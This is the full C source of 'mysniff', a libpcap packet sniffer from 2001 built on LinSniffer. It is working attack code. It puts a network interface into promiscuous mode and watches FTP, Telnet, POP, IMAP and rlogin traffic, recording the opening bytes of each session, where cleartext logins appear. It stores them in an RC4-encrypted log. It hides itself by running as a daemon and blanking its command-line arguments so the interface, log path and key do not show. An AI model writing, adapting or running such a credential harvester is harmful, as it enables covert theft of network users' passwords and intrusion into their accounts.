/*
 * mysniff
 *      libpcap sniffer with RC4 encryption
 * 
 * (!c) 2001, 2002 by Ighighi
 * Venezuela
 * 
 * Based on LinSniffer 0.666 by humble of rhino9
 * which is based on LinSniffer 0.03 by Mike Edulla
 * I added the encryption and the libpcap stuff, plus
 * a better filtering routine and beautified it a bit
 * 
 * DISCLAIMER:
 *      USE AT YOUR OWN RISK. I AM NOT RESPONSIBLE FOR ANYTHING.
 *
 * TODO;
 *   XXX's
 */

/* how many bytes do you want to capture per connection ? */
#define MAXIMUM_CAPTURE	128
/* how long before we stop watching an idle connection ? */
#define TIMEOUT		120

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <signal.h>
#include <fcntl.h>
#include <time.h>

#include <netinet/in.h>	/* htons() */

#include "pcap.h"

#include "tcpip.h"
#include "rc4.h"

#if 0	/* this filtering is done by bpf, see `expression' */
/*
 * Interesting ports
 */
#define FTP_PORT	21
#define TELNET_PORT	23
#define POP2_PORT	109
#define POP3_PORT	110
#define IMAP_PORT	143
#define RLOGIN_PORT	513
#endif

/* min() */
#ifndef	min
#define min(a, b)	(((a) > (b)) ? (b) : (a))
#endif

/*
 * list node
 */
struct connection {
    struct connection *next;
    
    time_t start;
    time_t last;
    
    u_int32_t saddr;
    u_int32_t daddr;
    u_int16_t sport;
    u_int16_t dport;
    
    unsigned char data[MAXIMUM_CAPTURE];
    int bytes;
};
typedef struct connection *list_t;

/*
 * Global variables:
 */
static char *expression = "port 21 or port 23 or port 109 or "
			  "port 110 or port 143 or port 513";
static list_t head	= NULL;	/* head of list */
static pcap_t *pcap_d	= NULL;	/* pcap descriptor */
static char interface[256];	/* interface to sniff */
static char logname[256];	/* log pathname */
static char rc4_key[256];	/* rc4 key (up to 2048 bits) */

static void add_node(u_int32_t sa, u_int32_t da, u_int16_t sp, u_int16_t dp)
{
    list_t newnode;
    
    newnode = (list_t) malloc(sizeof(struct connection));
    if (! newnode) {
	return;
    }
    
    newnode->saddr = sa;
    newnode->daddr = da;
    newnode->sport = sp;
    newnode->dport = dp;
    newnode->bytes = 0;
    time(&(newnode->start));
    time(&(newnode->last));
    
    newnode->next = head;
    head = newnode;
    
    return;
}		

#define RC4_Cryptme(x, me, ln) \
	RC4_Crypt((x), (unsigned char *) (me), (unsigned char *) (me), (ln))

static void log_node(struct connection *node)
{
    FILE *log;
    RC4 rc4;
    int len;

    if (! node) {
	return;
    }
    
    len = node->bytes;
    node->start = htonl(node->start);    
    node->bytes = htons(node->bytes);
    
    RC4_Init(&rc4, rc4_key, strlen(rc4_key));
    RC4_Cryptme(&rc4, &(node->start), 4);
    RC4_Cryptme(&rc4, &(node->saddr), 4);
    RC4_Cryptme(&rc4, &(node->daddr), 4);
    RC4_Cryptme(&rc4, &(node->dport), 2);    
    RC4_Cryptme(&rc4, &(node->bytes), 2);
    RC4_Cryptme(&rc4, &(node->data), len);

    log = fopen(logname, "a");
    if (! log) {
	return;
    }

    fwrite(&(node->start), 4, 1, log);	/* time */
    fwrite(&(node->saddr), 4, 1, log);	/* src addr */
    fwrite(&(node->daddr), 4, 1, log);	/* dst addr */
    fwrite(&(node->dport), 2, 1, log);	/* dst port */    
    fwrite(&(node->bytes), 2, 1, log);	/* length */
    fwrite(&(node->data), 1, len, log);	/* data */

    fclose(log);

    return;
}

static void remove_node(u_int32_t sa, u_int32_t da, u_int16_t sp, u_int16_t dp)
{
    list_t walker, prev;
    
    prev = walker = head;
    while (walker) {
	if ((sa == walker->saddr) &&
	    (da == walker->daddr) &&
	    (sp == walker->sport) &&
	    (dp == walker->dport)) {
	    
	    prev->next = walker->next;
	    if (walker == head) {
		head = head->next;
	    }
	    if (walker->bytes > 0) {
	        log_node(walker);
	    }
	    free(walker);
	    return;
	}
	prev = walker;
	walker = walker->next;
    }

    return;
}

static void update_node(u_int32_t sa, u_int32_t da, u_int16_t sp, u_int16_t dp,
			const unsigned char *buffer, int bytes)
{
    list_t walker;
    
    walker = head;
    while (walker) {
	if ((sa == walker->saddr) && 
	    (da == walker->daddr) &&
	    (sp == walker->sport) && 
	    (dp == walker->dport)) {
	    if (buffer) {
		bytes = min(bytes, MAXIMUM_CAPTURE - walker->bytes);
		memcpy(walker->data + walker->bytes, buffer, bytes);
		walker->bytes += bytes;
	    }
	    time(&(walker->last));
	    if (walker->bytes == MAXIMUM_CAPTURE) {
		remove_node(sa, da, sp, dp);
	    }
	    return;
	}
	walker = walker->next;
    }

    return;
}

static void purgeidle(void)
{
    list_t walker, prev;
    time_t curtime;
    
    time(&curtime);

    prev = walker = head;    
    while (walker) {
	if (curtime - walker->last  > TIMEOUT) {
	    prev->next = walker->next;
	    if (walker == head) {
		head = head->next;
	    }
	    if (walker->bytes > 0) {
	        log_node(walker);
	    }
	    prev = walker;
	    walker = walker->next;
	    free(prev);
	    prev = walker;
	    continue;
	}
	prev = walker;
	walker = walker->next;
    }
	
    return;
}

static void cleanup(int sig)
{
    if (pcap_d) {
	pcap_close(pcap_d);	/* quit promiscuous mode */
    }
    
    exit(0);
}

static void ip_filter(const unsigned char *p, int len)
{
    struct tcphdr *tcp;    
    struct iphdr *ip;
    int tcp_hlen;
    int ip_hlen;

    ip = (struct iphdr *) p;    
    
#if 0	/* this filtering is done by bpf */
    /* Check length */
    if (len < 20) {
	return;
    }

    /* Check IP header length */    
    ip_hlen = ip->ip_hl << 2;
    if (ip_hlen < 20) {
	return;
    }
    if (len < ip_hlen) {
	return;
    }

    /* Check IP protocol */
    if (ip->ip_p != IPPROTO_TCP) {
	return;
    }
#else
    ip_hlen = ip->ip_hl << 2;    
#endif    

    /* Avoid Ethernet padding */    
    len = min(len, ntohs(ip->ip_len));    
    
    p += ip_hlen;
    len -= ip_hlen;

    tcp = (struct tcphdr *) p;
    
#if 0	/* this filtering is done by bpf */    
    /* Check length */
    if (len < 20) {
	return;
    }
        
    /* Check TCP header length */
    tcp_hlen = tcp->th_off << 2;
    if (tcp_hlen < 20) {
	return;
    }
    if (len < tcp_hlen) {
	return;
    }
#else
    tcp_hlen = tcp->th_off << 2;    
#endif    

    p += tcp_hlen;
    len -= tcp_hlen;
    
    if (tcp->th_flags & (TH_FIN | TH_RST)) {
	/* Terminate / Reset connection (from client) */
	remove_node(ip->ip_src, ip->ip_dst, tcp->th_sport, tcp->th_dport);
	if (tcp->th_flags & TH_RST) {
	    /* Reset connection (from server) */
	    remove_node(ip->ip_dst, ip->ip_src, tcp->th_dport, tcp->th_sport);
	}
	return;
    }

#if 0	/* this filtering is done by bpf */	    
    switch (ntohs(tcp->th_dport)) {
	/* Good ports: */
    case FTP_PORT:
    case TELNET_PORT:
    case POP2_PORT:
    case POP3_PORT:
    case IMAP_PORT:
    case RLOGIN_PORT:
	break;
    default:
	/* Bad port... */
	return;
    };
#endif	        
    
    if ((tcp->th_flags & TH_SYN) && !(tcp->th_flags & TH_ACK)) {
	    /* Log SYN from client */
	    add_node(ip->ip_src, ip->ip_dst, tcp->th_sport, tcp->th_dport);
	    return;
    }
    
    update_node(ip->ip_src, ip->ip_dst, tcp->th_sport, tcp->th_dport, p, len);
    
    return;
}

#if 0	/* this filtering is done by bpf */
static void ether_filter(const unsigned char *p, int len)
{
    struct ethhdr *eth;

    eth = (struct ethhdr *) p;

    /* Check length */
    if (len < 14) {
	return;
    }
    
    /* Check ether type */
    if (ntohs(eth->ether_type) != ETHERTYPE_IP) {
	return;
    }

    /* Pass to IP */
    ip_filter(p + 14, len - 14);

    return;
}
#endif

void pcap_callback(u_char *user, const struct pcap_pkthdr *h, const u_char *p)
{
    int datalink;
    
    /* Purge idle connections */
    purgeidle();

    datalink = pcap_datalink(pcap_d);
    switch (datalink) {
    case DLT_EN10MB:	/* Ethernet / Linux loopback interface */
#if 0	/* this filtering is done by bpf */	
	ether_filter(p, h->caplen);
#else	
	ip_filter(p + 14, h->caplen - 14);
#endif	
	break;
    case DLT_RAW:	/* PPP / SLIP on some OSs (Linux & Irix) */
	ip_filter(p, h->caplen);
	break;
    case DLT_SLIP:	/* SLIP on some OSs */
	ip_filter(p + 16, h->caplen - 16);
	break;	
    case DLT_PPP:	/* PPP on some OSs */
    case DLT_NULL:	/* Used for the loopback interface on some OSs */
    case DLT_LOOP:	/* Used for the loopback interface on OpenBSD */
	ip_filter(p + 4, h->caplen - 4);
	break;
    default:
	break;
    }
    
    return;
}
    
int main(int argc, char *argv[])
{
    char pcap_err[PCAP_ERRBUF_SIZE];    /* pcap error message */
    struct bpf_program fprog;		/* bpf filter program */    
    bpf_u_int32 net_addr, net_mask;
    int i;

    if (argc == 4) {
	strncpy(interface, argv[1], sizeof(interface));
	strncpy(logname, argv[2], sizeof(logname));
	strncpy(rc4_key, argv[3], sizeof(rc4_key));
    }
    else {
	exit(1);
    }
    
    /* clean the argument list */
    for (i = 1; i < argc; i++) {
	memset(argv[i], 0, strlen(argv[i]));
    }
    
    if (fork() == 0) {
	/* run as a daemon */
	setsid();
	close(0); close(1); close(2);	
	i = open("/dev/null", O_RDWR);
	dup2(0, i); dup2(1, i); dup2(2, i);
	close(i);

	signal(SIGHUP, SIG_IGN);	/* Hangup */
	signal(SIGINT, cleanup);	/* Interrupt from keyboard */
	signal(SIGQUIT, cleanup);	/* Termination signal */	
	signal(SIGTERM, cleanup);	/* Quit from keyboard */

	if (pcap_lookupnet(interface, &net_addr, &net_mask, pcap_err) < 0) {
	    exit(1);
	}	
	
	/* open interface and set promiscuous mode */
	pcap_d = pcap_open_live(interface, 2048, 1, 0, pcap_err);
	if (! pcap_d) {
	    exit(1);
	}
	
	if (pcap_compile(pcap_d, &fprog, expression, 1, net_mask) < 0) {
	    pcap_close(pcap_d);
	    exit(1);
	}
	
	if (pcap_setfilter(pcap_d, &fprog) < 0) {
	    pcap_close(pcap_d);
	    exit(1);
	}
	
	if (pcap_loop(pcap_d, -1, pcap_callback, NULL) < 0) {
	    pcap_close(pcap_d);
	    exit(1);
	}	
			 
	exit(0);
    }
    
    exit(0);
}
